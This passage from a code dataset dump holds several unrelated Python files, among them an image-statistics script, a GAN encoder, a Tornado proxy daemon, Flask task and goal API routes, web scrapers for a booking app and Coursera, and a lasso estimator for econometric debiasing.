x = x / 255\n\n# # print(x.shape)\n# # print(x[0, 0].shape)\n# # break\n\n# n = n + 1\n# delta = x - mean\n# mean = mean + delta / n\n# var = var + delta * (x - mean)\n\n# if index % 1000 == 0:\n# print(index)\n\n# # count += 1\n# # if count == 3:\n# # print('x.shape: ', x.shape)\n# # print('x: ', x)\n# # print('n: ', n)\n\n# # print('delta.shape: ', delta.shape)\n# # print('delta: ', delta)\n\n# # print('mean.shape: ', mean.shape)\n# # print('mean: ', mean)\n\n# # print('var.shape: ', var.shape)\n# # print('var: ', var)\n\n# # break\n\n\n# std = np.sqrt(var)\n\n\n# return mean, std\n\n\ndef online_mean_and_std_channel(image_list):\n n = 0\n mean = 0\n square_mean = 0\n\n # count = 0\n\n for index, image_path in enumerate(image_list):\n x = io.imread(image_path)\n x = np.asarray(x, dtype=np.float32)\n\n # x = x / 255\n\n # print(x.shape)\n # print(x[0, 0].shape)\n # break\n\n prev_n = n\n n += x.shape[0] * x.shape[1]\n\n x = x.reshape([-1, 3])\n square_x = np.square(x)\n\n square_mean = square_mean * (1.0 * prev_n / n) + np.sum(square_x, axis=0) / n\n mean = mean * (1.0 * prev_n / n) + np.sum(x, axis=0) / n\n\n if index % 10000 == 0:\n print(index)\n\n # print(1.0 * prev_n / n)\n # print(index)\n # print(x.shape)\n # print(square_x.shape)\n # print(np.sum(x, axis=0) / (128 * 128))\n # print(np.sum(square_x, axis=0) / (128 * 128))\n # print(mean)\n # print(square_mean)\n\n # if index == 10:\n # break\n\n var = square_mean - np.square(mean)\n std = np.sqrt(var)\n\n return mean, std\n\n\ndef save_params(mean, std):\n # filename ='normalization_params.npz'\n\n filename ='rm_block_effect/channel_normalization_params.npz'\n\n np.savez(filename, mean=mean, std=std)\n print('Normalization parameters saved to {}'.format(filename))\n\n print('-----')\n print(mean)\n print('Mean max: {}'.format(np.max(mean)))\n print('Mean min: {}'.format(np.min(mean)))\n print('-----')\n print(std)\n print('Std max: {}'.format(np.max(std)))\n print('Std min: {}'.format(np.min(std)))\n print('-----')\n\n\nimage_list = read_image_list(recons_train_data_list)\n# mean, std = online_mean_and_std(image_list)\n\nmean, std = online_mean_and_std_channel(image_list)\nsave_params(mean, std)\n","sub_path":"rm_block_effect/get_bf_rm_normalization_params.py","file_name":"get_bf_rm_normalization_params.py","file_ext":"py","file_size_in_byte":2960,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"216355083","text":"from torch import nn, Tensor\n\nfrom framework.gan.generator import Generator as G\nfrom framework.nn.modules.common.self_attention import SelfAttention2d\nfrom framework.nn.modules.resnet.residual import Down2xResidualBlock, PaddingType\nfrom useful_utils.spectral_functions import spectral_norm_init\n\n\nclass DCEncoder(G):\n def __init__(self, nc: int = 3, nc_out: int = 10, ndf: int = 32):\n super(DCEncoder, self).__init__()\n\n self.main = nn.Sequential(\n spectral_norm_init(nn.Conv2d(nc, ndf, 4, 2, 1, bias=False)),\n nn.BatchNorm2d(ndf),\n nn.LeakyReLU(0.2, inplace=True),\n # nn.InstanceNorm2d(ndf, affine=True),\n # input is (ndf) x 64 x 64\n spectral_norm_init(nn.Conv2d(ndf, ndf, 4, 2, 1, bias=False)),\n nn.BatchNorm2d(ndf),\n nn.LeakyReLU(0.2, inplace=True),\n # nn.InstanceNorm2d(ndf, affine=True),\n # state size. (ndf) x 32 x 32\n SelfAttention2d(ndf),\n spectral_norm_init(nn.Conv2d(ndf, ndf * 2, 4, 2, 1, bias=False)),\n nn.BatchNorm2d(ndf * 2),\n nn.LeakyReLU(0.2, inplace=True),\n # nn.InstanceNorm2d(ndf * 2, affine=True),\n # state size. (ndf*2) x 16 x 16\n spectral_norm_init(nn.Conv2d(ndf * 2, ndf * 4, 4, 2, 1, bias=False)),\n nn.BatchNorm2d(ndf * 4),\n nn.LeakyReLU(0.2, inplace=True),\n # nn.InstanceNorm2d(ndf * 4, affine=True),\n # state size. (ndf*4) x 8 x 8\n spectral_norm_init(nn.Conv2d(ndf * 4, ndf * 8, 4, 2, 1, bias=False)),\n nn.BatchNorm2d(ndf * 8),\n nn.LeakyReLU(0.2, inplace=True),\n )\n\n self.linear = spectral_norm_init(nn.Linear(ndf * 8 * 4 * 4, nc_out))\n\n def forward(self, x: Tensor) -> Tensor:\n conv = self.main(x)\n return self.linear(\n conv.view(conv.shape[0], -1)\n )\n","sub_path":"gan/dcgan/encoder.py","file_name":"encoder.py","file_ext":"py","file_size_in_byte":1911,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"153018769","text":"class Employee:\n def __init__(self, first, last, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.first = first\n self.last = last\n # self.pay = pay\n # self.email = first + \".\" + last + \"@company.com\"\n # Employee.num_of_employees += 1\n\n @property\n def email(self):\n return \"{}.{}@company.com\".format(self.first, self.last)\n\n @property\n def fullname(self):\n return \"{} {}\".format(self.first, self.last)\n\n @fullname.setter\n def fullname(self, name):\n first, last = name.split(\" \")\n self.first = first\n self.last = last\n\n @fullname.deleter\n def fullname(self):\n print(\"Delete Name!\")\n self.first = None\n self.last = None\n\n\nemp1 = Employee(\"Vasudev\", \"Patil\")\nemp2 = Employee(\"test\", \"user\")\n\nemp1.fullname = \"John Smith\"\n# emp1.first = \"Jim\"\n\nprint(emp1.first)\nprint(emp1.email)\nprint(emp1.fullname)\n\ndel emp1.fullname\n","sub_path":"usingPropertyDecorators.py","file_name":"usingPropertyDecorators.py","file_ext":"py","file_size_in_byte":950,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"218217109","text":"import os\nimport sys\nimport errno\nimport signal\nimport pynsive\nimport inspect\nimport socket\nimport multiprocessing\n\nfrom tornado.ioloop import IOLoop\nfrom tornado.netutil import bind_sockets\nfrom tornado.process import cpu_count\n\nfrom pyrox.log import get_logger, get_log_manager\nfrom pyrox.filtering import HttpFilterPipeline\nfrom pyrox.util.config import ConfigurationError\nfrom pyrox.server.config import load_pyrox_config\nfrom pyrox.server.proxyng import TornadoHttpProxy\n\n\n_LOG = get_logger(__name__)\n_active_children_pids = list()\n\n\nclass FunctionWrapper(object):\n\n def __init__(self, func):\n self._func = func\n\n def on_request(self, request):\n return self._func(request)\n\n def on_response(self, response):\n return self._func(response)\n\n\ndef stop_child(signum, frame):\n IOLoop.instance().add_callback_from_signal(\n lambda: IOLoop.current().stop())\n\n\ndef stop_parent(signum, frame):\n for pid in _active_children_pids:\n os.kill(pid, signal.SIGTERM)\n\n\ndef _resolve_filter_classes(cls_list):\n filter_cls_list = list()\n\n # Gather the classes listed in the order they're listed\n for cdef in cls_list:\n # If there's a complex module path, process the ends of it\n if '.' not in cdef:\n raise ImportError('Bad filter class: {}'.format(cdef))\n\n module = pynsive.import_module(cdef[:cdef.rfind('.')])\n\n try:\n cls = getattr(module, cdef[cdef.rfind('.') + 1:])\n if inspect.isclass(cls):\n filter_cls_list.append(cls)\n elif inspect.isfunction(cls):\n def create():\n return FunctionWrapper(cls)\n filter_cls_list.append(create)\n else:\n raise TypeError(\n 'Type of a filter must be a function or a class')\n except AttributeError:\n raise ImportError('Unable to import: {}'.format(cdef))\n return filter_cls_list\n\n\ndef _build_plfactory_closure(filter_cls_list):\n # Closure for creation of new pipelines\n def new_filter_pipeline():\n pipeline = HttpFilterPipeline()\n for cls in filter_cls_list:\n pipeline.add_filter(cls())\n return pipeline\n return new_filter_pipeline\n\n\ndef _build_singleton_plfactory_closure(filter_classes, filter_instances):\n # Closure for creation of new singleton pipelines\n def new_filter_pipeline():\n pipeline = HttpFilterPipeline()\n for cls in filter_classes:\n pipeline.add_filter(filter_instances[cls.__name__])\n return pipeline\n return new_filter_pipeline\n\n\ndef _build_singleton_plfactories(config):\n all_classes = list()\n filter_instances = dict()\n\n # Gather all the classes\n all_classes.extend(_resolve_filter_classes(config.pipeline.upstream))\n all_classes.extend(_resolve_filter_classes(config.pipeline.downstream))\n\n for cls in all_classes:\n filter_instances[cls.__name__] = cls()\n\n upstream = _build_singleton_plfactory_closure(\n _resolve_filter_classes(config.pipeline.upstream), filter_instances)\n downstream = _build_singleton_plfactory_closure(\n _resolve_filter_classes(config.pipeline.downstream), filter_instances)\n return upstream, downstream\n\n\ndef _build_plfactories(config):\n upstream = _build_plfactory_closure(\n _resolve_filter_classes(config.pipeline.upstream))\n downstream = _build_plfactory_closure(\n _resolve_filter_classes(config.pipeline.downstream))\n return upstream, downstream\n\n\ndef start_proxy(sockets, config):\n # Take over SIGTERM and SIGINT\n signal.signal(signal.SIGTERM, stop_child)\n signal.signal(signal.SIGINT, stop_child)\n\n # Create a PluginManager\n plugin_manager = pynsive.PluginManager()\n for path in config.core.plugin_paths:\n plugin_manager.plug_into(path)\n\n # Resolve our filter chains\n try:\n if config.pipeline.use_singletons:\n filter_pipeline_factories = _build_singleton_plfactories(config)\n else:\n filter_pipeline_factories = _build_plfactories(config)\n except Exception as ex:\n _LOG.exception(ex)\n return -1\n\n #TODO(jwood) Get SSL info from config file.\n ssl_options = None\n # {\n # \"certfile\": \"/Users/john.wood/projects/security/tornado_related/pyrox/test.crt\",\n # \"keyfile\": \"/Users/john.wood/projects/security/tornado_related/pyrox/test.key\"\n # }\n\n # Create proxy server ref\n http_proxy = TornadoHttpProxy(\n filter_pipeline_factories,\n config.routing.upstream_hosts,\n ssl_options=ssl_options)\n\n # Add our sockets for watching\n http_proxy.add_sockets(sockets)\n\n # Start tornado\n IOLoop.current().start()\n\n\ndef start_pyrox(other_cfg=None):\n config = load_pyrox_config(other_cfg) if other_cfg else load_pyrox_config()\n\n # Init logging\n logging_manager = get_log_manager()\n logging_manager.configure(config)\n\n # dst = config.routing.upstream_hosts\n # print(\"________ dst:{}\".format(dst))\n # print(\"________ dst0/1:{0}/{1}\".format(dst[0], dst[1]))\n\n _LOG.info('Upstream targets areeee: {}'.format(\n ['https://{0}:{1}'.format(dst[0], dst[1])\n for dst in config.routing.upstream_hosts]))\n\n # Set bind host\n bind_host = config.core.bind_host.split(':')\n if len(bind_host) != 2:\n raise ConfigurationError('bind_host must have a port specified')\n\n # Bind the sockets in the main process\n sockets = bind_sockets(port=bind_host[1], address=bind_host[0])\n\n # Bind the server port(s)\n _LOG.info('Pyrox listening on: http://{0}:{1}'.format(\n bind_host[0], bind_host[1]))\n\n # Start Tornado\n num_processes = config.core.processes\n\n if num_processes <= 0:\n num_processes = cpu_count()\n\n global _active_children_pids\n\n for i in range(num_processes):\n pid = os.fork()\n if pid == 0:\n print('Starting process {}'.format(i))\n start_proxy(sockets, config)\n sys.exit(0)\n else:\n _active_children_pids.append(pid)\n\n # Take over SIGTERM and SIGINT\n signal.signal(signal.SIGTERM, stop_parent)\n signal.signal(signal.SIGINT, signal.SIG_IGN)\n\n while len(_active_children_pids):\n try:\n pid, status = os.wait()\n except OSError as oserr:\n if oserr.errno != errno.EINTR:\n _LOG.exception(oserr)\n continue\n except Exception as ex:\n _LOG.exception(ex)\n continue\n\n _LOG.info('Child process {} exited with status {}'.format(\n pid, status))\n _active_children_pids.remove(pid)\n","sub_path":"pyrox/server/daemon.py","file_name":"daemon.py","file_ext":"py","file_size_in_byte":6647,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"235440779","text":"class Solution:\n def game(self, guess,answer):\n Count=0\n for i in range(len(guess)):\n Guess=guess[i]\n if Guess==answer[i]:\n Count+=1\n return Count\n\nif __name__==\"__main__\":\n print(Solution().game([2,2,3],[3,2,3]))","sub_path":"LeetCode/猜数字.py","file_name":"猜数字.py","file_ext":"py","file_size_in_byte":277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"160466509","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Dec 17 10:38:27 2020\r\n\r\n@author: tho2303\r\n\"\"\"\r\nimport requests\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom decimal import*\r\nimport dataframe_image as dfi #lager tabell direkte fra en pd.dataframe\r\n\r\n#%% Variabler\r\nMaaned=2\r\nDato=22\r\nnamelength=20\r\ntimeshift=+1\r\n#%% henter csv-fil fra BK-app\r\nbody = {\r\n 'email':'',\r\n 'password':''\r\n}\r\n\r\nresponse = requests.post('https://app.buldrekontoret.com/api/login', json=body)\r\nrequestCookies = {'connect.sid': response.cookies['connect.sid']}\r\ndata = requests.get('https://app.buldrekontoret.com/api/admin/reservations.csv', cookies=requestCookies)\r\n#%% ordner opp i datastrengen og samler den i array M klar for sortering\r\nstring=data.text.replace('\\r\\n',',') \r\nlist= string.split(\",\")\r\n\r\nM=np.zeros(int((len(list)/3)),dtype=object)\r\n\r\nfor i in range(0,len(M)): \r\n M[i]=list[i*3]+list[i*3+1]+list[i*3+2]\r\n \r\nMs=np.sort(M) #sorterer M \r\n\r\n#%% finner antallet n som tilfredsstiller måned og dato\r\nn=0\r\nfor i in range (0,len(M)):\r\n if int(Ms[i][5:7])==Maaned and int(Ms[i][8:10])==Dato:\r\n n+=1\r\n#%% Deler opp sortert liste i ny array T\r\nT=np.zeros([n,5],dtype=object)\r\nN=0\r\nfor i in range (0,len(M)):\r\n getcontext().prec =4\r\n tekst=Ms[i]\r\n if int(tekst[5:7])==Maaned and int(tekst[8:10])==Dato:\r\n T[N,0]=int(tekst[5:7])\r\n T[N,1]=int(tekst[8:10])\r\n T[N,2]=Decimal(tekst[11:13]+'.'+tekst[14:16])+timeshift \r\n T[N,3]=Decimal(tekst[35:37]+'.'+tekst[38:40])+timeshift\r\n T[N,4]=tekst[48:48+namelength]\r\n N+=1\r\n \r\n#%% Oppretter panda dataframe fra T\r\ndata = pd.DataFrame(T)\r\ndata.rename(columns={0: 'Month', 1: 'Day',2: 'Start', 3: 'Stop', 4: 'Name'}, inplace=True)\r\nprint(data)\r\n#%% eksport til png-tabell\r\ndf_styled = data.style.background_gradient() \r\ndfi.export(df_styled,\"Bookingoversikt.png\")\r\n \r\n","sub_path":"Bookingoversikt.py","file_name":"Bookingoversikt.py","file_ext":"py","file_size_in_byte":1874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"213276205","text":"from flask.wrappers import Response\nfrom sqlalchemy.orm import query\nfrom app import db\nfrom app.models.task import Task\nfrom flask import Blueprint, jsonify, make_response, request\nfrom datetime import datetime\nimport os\nimport requests\nfrom app.models.goal import Goal\n\ntasks_bp = Blueprint(\"tasks\", __name__, url_prefix=\"/tasks\")\n\n@tasks_bp.route(\"\", methods=[\"GET\", \"POST\"])\ndef handle_tasks():\n if request.method == \"POST\":\n \n request_body = request.get_json()\n \n if \"title\" not in request_body or \"description\" not in request_body or \"completed_at\" not in request_body:\n return {\n \"details\": \"Invalid data\"\n },400\n new_task = Task(title=request_body[\"title\"],\n description=request_body[\"description\"],\n completed_at=request_body[\"completed_at\"])\n is_complete = new_task.completed_at is not None\n\n db.session.add(new_task)\n db.session.commit()\n\n return {'task':\n {\"id\": new_task.task_id,\n \"title\": new_task.title,\n \"description\": new_task.description,\n \n \"is_complete\": is_complete\n }},201\n \n elif request.method == \"GET\":\n query = request.args.get(\"sort\")\n if query == \"asc\":\n tasks = Task.query.order_by(Task.title)\n elif query == \"desc\":\n tasks = Task.query.order_by(Task.title.desc()) \n else:\n tasks = Task.query.all()\n tasks_response = []\n for task in tasks:\n is_complete = task.completed_at is not None\n tasks_response.append({\n \"id\": task.task_id,\n \"title\": task.title,\n \"description\": task.description,\n \n \"is_complete\": is_complete\n })\n return jsonify(tasks_response)\n\n@tasks_bp.route(\"/\", methods=[\"GET\", \"PUT\", \"DELETE\"])\ndef handle_task(task_id):\n task = Task.query.get(task_id)\n if task is None:\n return make_response(\"\", 404)\n\n if request.method == \"GET\":\n response_body = {\"task\": (task.to_dict())}\n return jsonify(response_body),200 \n \n \n elif request.method == \"PUT\":\n form_data = request.get_json()\n\n task.title = form_data[\"title\"]\n task.description = form_data[\"description\"]\n if \"completed_at\" in form_data :\n task.completed_at = form_data[\"completed_at\"]\n else:\n task.completed_at = None\n\n db.session.commit()\n \n\n return {\"task\":\n {\n \"id\": task.task_id,\n \"title\": task.title,\n \"description\": task.description,\n \"is_complete\":bool(task.completed_at) \n }\n },200\n \n elif request.method == \"DELETE\":\n db.session.delete(task)\n db.session.commit()\n return {\n \"details\": f'Task {task_id} \"{task.title}\" successfully deleted'\n }\n\n@tasks_bp.route(\"//mark_complete\", methods=[\"PATCH\"])\ndef mark_complete(task_id):\n if not task_id.isnumeric():\n return {\"Error\": f\"{task_id} must be numeric.\"} , 404\n task_id = int(task_id)\n task = Task.query.get(task_id)\n if not task :\n return \"None\", 404\n\n task.completed_at = datetime.utcnow()\n #save action\n db.session.commit()\n path = \"https://slack.com/api/chat.postMessage\"\n\n SLACK_API_KEY = os.environ.get(\"SLACK_API_KEY\")\n\n query_params = {\n \"token\":SLACK_API_KEY,\n \"channel\": \"task-notifications\",\n \"text\":f\"Task {task.title} is complete!\"\n }\n response = requests.post(path, data=query_params)\n \n return {\"task\":{\n \"id\":task.task_id,\n \"title\":task.title,\n \"description\": task.description,\n \"is_complete\": True\n } }, 200\n\n@tasks_bp.route(\"//mark_incomplete\", methods=[\"PATCH\"])\ndef mark_incomplete(task_id):\n if not task_id.isnumeric():\n return {\"Error\": f\"{task_id} must be numeric.\"} , 404\n task_id = int(task_id)\n task = Task.query.get(task_id)\n if not task :\n return \"None\", 404\n\n task.completed_at = None\n #save action\n db.session.commit()\n return {\"task\":{\n \"id\":task.task_id,\n \"title\":task.title,\n \"description\": task.description,\n \"is_complete\": False\n } }, 200\n\ngoals_bp = Blueprint(\"goals\", __name__, url_prefix=\"/goals\")\n\n\n@goals_bp.route(\"\", methods=[\"GET\", \"POST\"])\ndef handle_goals():\n if request.method == \"POST\":\n \n request_body = request.get_json()\n \n if \"title\" not in request_body:\n return {\n \"details\": \"Invalid data\"\n },400\n new_goal = Goal(title=request_body[\"title\"])\n\n db.session.add(new_goal)\n db.session.commit()\n\n return {'goal':\n {\"id\": new_goal.goal_id,\n \"title\": new_goal.title\n }},201\n \n elif request.method == \"GET\":\n query = request.args.get(\"sort\")\n if query == \"asc\":\n goals = Goal.query.order_by(Goal.title)\n elif query == \"desc\":\n goals = Goal.query.order_by(Goal.title.desc()) \n else:\n goals = Goal.query.all()\n goals_response = []\n for goal in goals:\n goals_response.append({\n \"id\": goal.goal_id,\n \"title\": goal.title\n })\n return jsonify(goals_response)\n\n@goals_bp.route(\"/\", methods=[\"GET\", \"PUT\", \"DELETE\"])\ndef handle_goal(goal_id):\n goal = Goal.query.get(goal_id)\n if goal is None:\n return make_response(\"\", 404)\n\n if request.method == \"GET\":\n return {\"goal\":\n {\n \"id\": goal.goal_id,\n \"title\": goal.title\n }\n }\n \n elif request.method == \"PUT\":\n form_data = request.get_json()\n goal.title = form_data[\"title\"]\n\n db.session.commit()\n \n\n return {\"goal\":\n {\n \"id\": goal.goal_id,\n \"title\": goal.title\n }\n },200\n \n elif request.method == \"DELETE\":\n db.session.delete(goal)\n db.session.commit()\n return {\n \"details\": f'Goal {goal_id} \"{goal.title}\" successfully deleted'\n }\n\n@goals_bp.route(\"//tasks\", methods=[\"POST\"])\ndef post_tasks_for_goals(goal_id):\n goal = Goal.query.get_or_404(goal_id)\n request_body = request.get_json()\n\n for each_task in request_body[\"task_ids\"]:\n each_task = Task.query.get(each_task)\n each_task.fk_goal_id = goal.goal_id\n \n return make_response(jsonify({\"id\":goal.goal_id, \"task_ids\":request_body[\"task_ids\"]}),200)\n\n@goals_bp.route(\"//tasks\",methods=[\"GET\"])\ndef get_tasks_for_goal(goal_id):\n goal = Goal.query.get_or_404(goal_id)\n response_body=goal.verbose_goal_dict()\n return jsonify(response_body), 200","sub_path":"app/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":6939,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"487904062","text":"import argparse\nimport requests\nfrom lxml import etree\nfrom collections import namedtuple\nfrom bs4 import BeautifulSoup\nfrom openpyxl import Workbook\nimport random\n\n\nCourseData = namedtuple('CourseData', 'title,language,resent_date,count_weeks,rating')\n\n\ndef get_courses_urls_list(output_list_size):\n url = 'https://www.coursera.org/sitemap~www~courses.xml'\n response = requests.get(url)\n tree = etree.fromstring(response.content)\n all_courses_urls_list = tree.xpath(\n '//ns:url/ns:loc/text()', namespaces={'ns': 'http://www.sitemaps.org/schemas/sitemap/0.9'})\n return random.sample(all_courses_urls_list, output_list_size)\n\n\ndef get_course_info(course_slug):\n response = requests.get(course_slug)\n soup = BeautifulSoup(response.content, 'lxml')\n basic_info_table = soup.find(\n 'table',\n attrs={\n 'class': 'basic-info-table bt3-table bt3-table-striped bt3-table-bordered bt3-table-responsive'\n }\n )\n table_body = basic_info_table.next\n rating_node = soup.find('div', attrs={'class': 'ratings-text bt3-hidden-xs'})\n return CourseData(\n title=soup.find('h1', attrs={'class': 'title display-3-text'}).text,\n language=soup.find('div', attrs={'class': 'rc-Language'}).text,\n resent_date=soup.find(\n 'div', attrs={'class': 'startdate rc-StartDateString caption-text'}).find('span').text,\n count_weeks=_get_text_from_basic_info_table(table_body, 'Commitment'),\n rating=rating_node.text if rating_node is not None else '',\n )\n\n\ndef _get_text_from_basic_info_table(table_element, row_name):\n for row in table_element.find_all('tr'):\n if row.find_all('td')[0].text == row_name:\n return row.find_all('td')[-1].text\n else:\n return ''\n\n\ndef output_courses_info_to_xlsx(file_path, curses_urls_list, class_namedtuple):\n work_book = Workbook()\n work_sheet = work_book.active\n work_sheet.append(class_namedtuple._fields)\n for course_url in curses_urls_list:\n course_info = get_course_info(course_url)\n work_sheet.append(course_info)\n work_book.save(file_path)\n\n\ndef get_args():\n parser = argparse.ArgumentParser(description='Get info from coursera')\n parser.add_argument('path', type=str, help='Path to file. It is better to use xlsx extention.')\n return parser.parse_args()\n\n\nif __name__ == '__main__':\n args = get_args()\n file_path = args.path\n size = 20\n courses_urls_list = get_courses_urls_list(size)\n output_courses_info_to_xlsx(file_path, courses_urls_list, CourseData)\n","sub_path":"coursera.py","file_name":"coursera.py","file_ext":"py","file_size_in_byte":2568,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"23829995","text":"#stage 1 function\nimport numpy as np\nimport pandas as pd\nbase = \"/Users/max/Documents/ag_production_functions/code/riesz_representer/rr_python/\" \nimport os\nimport sys\nimport scipy.sparse as sc_sparse\nfrom scipy.stats import norm\nimport copy\n\nsys.path.append(os.path.abspath(base))\nimport config\nimport primitives\n\ndef RMD_dantzig(M, G, D, _lambda=0, sparse=True):\n return \"not yet implemented; use RMD_lasso instead \"\n\ndef RMD_lasso(M, G, D, _lambda=0, control = {\"max_iter\":1000, \"optTol\":1e-5, \"zeroThreshold\":1e-6},\n beta_start = None):\n p = G.shape[1] # num columns \n Gt = G\n Mt = M\n L = np.concatenate([np.array([config.l]), np.ones(p-1)])\n lambda_vec = _lambda*L*D\n if beta_start is None: # Warm start; allows passing in previous beta\n beta = np.zeros(p)\n else:\n beta = beta_start\n wp = beta\n mm = 1\n while mm < control['max_iter']:\n beta_old = copy.deepcopy(beta)\n for j in range(p):\n rho = Mt[j] - Gt[j, :] @ beta + Gt[j,j]*beta[j]\n z = Gt[j,j]\n if np.isnan(rho):\n beta[j] = 0\n continue\n if rho < -1 * lambda_vec[j]:\n beta[j] = (rho+lambda_vec[j])/z\n if (np.abs(rho) <= lambda_vec[j]):\n beta[j] = 0\n if (rho > lambda_vec[j]):\n beta[j] = (rho-lambda_vec[j])/z\n wp = np.c_[wp, beta]\n if (np.nansum(np.abs(beta - beta_old)) < control['optTol']):\n break\n mm = mm + 1\n w = beta\n w[abs(w) < control['zeroThreshold']] = 0\n return w, wp, mm # returns coefficients, list of past coefficients, and number of steps \n\ndef get_D(Y,X,X_up,X_down,delta,m,rho_hat):\n n = X.shape[0] # num rows\n p = X.shape[1] # num columns\n df = np.zeros((p, n))\n for i in range(n):\n df[:, i] = X[i, :] * np.array(rho_hat @ X[i, :]) - m(Y[i], X[i, :], X_up[i, :], X_down[i, :], delta, primitives.b)\n df = df**2\n D2 = np.mean(df, 1) # Takes row means of df\n D = np.sqrt(D2)\n return D\n\n# get_D <- function(Y,X,X.up,X.down,delta,m,rho_hat){\n# n=dim(X)[1]\n# p=dim(X)[2]\n \n# df=matrix(0,p,n)\n# for (i in 1:n){\n# df[,i]=X[i,]*as.vector(rho_hat %*% X[i,])-m(Y[i],X[i,],X.up[i,],X.down[i,],delta,b)\n# }\n# df=df^2\n# D2=rowMeans(df)\n \n# D=sqrt(D2)\n# return(D) #pass around D as vector\n# }\n\n\n\ndef RMD_stable(Y,X,X_up,X_down,delta,p0,D_LB,D_add,max_iter,is_alpha,is_lasso):\n n = X.shape[0] # num rows\n p = X.shape[1] # num columns\n\n # First, find low-dimensional moments\n X0 = X[:, 0:p0]\n X0_up = X_up[:, 0:p0]\n X0_down = X_down[:, 0:p0]\n M_hat0, N_hat0, G_hat0, B0 = primitives.get_MNG(Y, X0, X0_up, X0_down, delta)\n\n # initial estimate\n rho_hat0 = np.linalg.solve(G_hat0, M_hat0)\n rho_hat = np.concatenate([rho_hat0, np.zeros(p - G_hat0.shape[1])]) \n beta_hat0 = np.linalg.solve(G_hat0, N_hat0)\n beta_hat = np.concatenate([beta_hat0, np.zeros(p - G_hat0.shape[1])]) \n\n # Full moments\n M_hat, N_hat, G_hat, B = primitives.get_MNG(Y, X, X_up, X_down, delta)\n # penalty term \n _lambda = config.c * norm.ppf(1 - config.alpha / (2 * p)) / np.sqrt(n)\n if is_alpha:\n ###########\n # alpha_hat\n ###########\n diff_rho=1\n k=1\n while (diff_rho>config.tol) & (k<=max_iter):\n # previous values\n rho_hat_old=copy.deepcopy(rho_hat)\n \n # normalization\n D_hat_rho=get_D(Y,X,X_up,X_down,delta,primitives.m_diff,rho_hat_old)\n D_hat_rho=np.maximum(D_LB,D_hat_rho) \n D_hat_rho=D_hat_rho+D_add\n if is_lasso:\n rho_hat = RMD_lasso(M_hat, G_hat, D_hat_rho, _lambda)[0]\n else:\n return \"dantzig selector not implemented\"\n beta_hat = RMD_dantzig(M_hat, G_hat, D_hat_rho, _lambda)[0]\n # difference\n diff_rho=primitives.two_norm(rho_hat-rho_hat_old)\n k=k+1\n print('k: ' + str(k))\n return rho_hat\n else:\n ###########\n # gamma_hat\n ###########\n diff_beta=1\n k=0\n while (diff_beta>config.tol) & (k<=max_iter):\n # previous values\n beta_hat_old=copy.deepcopy(beta_hat)\n \n # normalization\n D_hat_beta=get_D(Y,X,X_up,X_down,delta,primitives.m2,beta_hat_old)\n D_hat_beta=np.maximum(D_LB,D_hat_beta) # What is this? \n D_hat_beta=D_hat_beta+D_add\n if is_lasso:\n beta_hat = RMD_lasso(N_hat, G_hat, D_hat_beta, _lambda)[0]\n else:\n return \"dantzig selector not implemented\"\n beta_hat = RMD_dantzig(N_hat, G_hat, D_hat_beta, _lambda)[0]\n # difference\n diff_beta=primitives.two_norm(beta_hat-beta_hat_old)\n k=k+1\n print('k: ' + str(k))\n return beta_hat\n\narg_Forest = {\"clas_nodesize\":1, \"reg_nodesize\":5, \"ntree\":1000, \"na_action\":\"na_omit\", \"replace\":True}\narg_Nnet = {'size':8, 'maxit':1000, 'decay':0.01, 'MaxNWts':10000, 'trace':False}\n\ndef get_stage_1(Y,X,X_up,X_down,delta,p0,D_LB,D_add,max_iter,alpha_estimator,gamma_estimator):\n n = X.shape[0] # num rows\n p = X.shape[1] # num columns\n MNG = primitives.get_MNG(Y, X, X_up, X_down, delta)\n B = MNG[3]\n\n ###########\n # alpha hat\n ###########\n rho_hat = RMD_stable(Y, X, X_up, X_down, delta, p0, D_LB, D_add, max_iter,\n is_alpha=1, is_lasso=(alpha_estimator == 'lasso'))\n def alpha_hat(x):\n return primitives.b(x) @ rho_hat\n\n ###########\n # gamma hat\n ###########\n if gamma_estimator == \"dantzig\":\n beta_hat=RMD_stable(Y, X, X_up, X_down, delta, p0, D_LB, D_add, max_iter,\n is_alpha=0, is_lasso=0)\n def gamma_hat(x):\n return primitives.b(x) @ beta_hat\n elif gamma_estimator == \"lasso\":\n beta_hat=RMD_stable(Y, X, X_up, X_down, delta, p0, D_LB, D_add, max_iter,\n is_alpha=0, is_lasso=1)\n def gamma_hat(x):\n return primitives.b(x) @ beta_hat\n elif gamma_estimator == \"frst\":\n return \"random forest not implemented\"\n elif gamma_estimator == \"nnet\":\n return \"neural net not implemented \"\n return alpha_hat, gamma_hat \n\n# get_stage1<-function(Y,X,X.up,X.down,delta,p0,D_LB,D_add,max_iter,alpha_estimator,gamma_estimator){\n \n# n=dim(X)[1]\n# p=dim(X)[2]\n# MNG<-get_MNG(Y,X,X.up,X.down,delta)\n# B=MNG[[4]]\n \n# ###########\n# # alpha hat\n# ###########\n# if(alpha_estimator==0){ # dantzig\n \n# rho_hat=RMD_stable(Y,X,X.up,X.down,delta,p0,D_LB,D_add,max_iter,1,0)\n# alpha_hat<-function(x){\n# return(b(x)%*%rho_hat)\n# }\n \n# } else if(alpha_estimator==1){ # lasso\n \n# rho_hat=RMD_stable(Y,X,X.up,X.down,delta,p0,D_LB,D_add,max_iter,1,1)\n# alpha_hat<-function(x){\n# return(b(x)%*%rho_hat)\n# }\n \n# }\n \n# ###########\n# # gamma hat\n# ###########\n# if(gamma_estimator==0){ # dantzig\n \n# beta_hat=RMD_stable(Y,X,X.up,X.down,delta,p0,D_LB,D_add,max_iter,0,0)\n# gamma_hat<-function(x){\n# return(b(x)%*%beta_hat)\n# }\n \n# } else 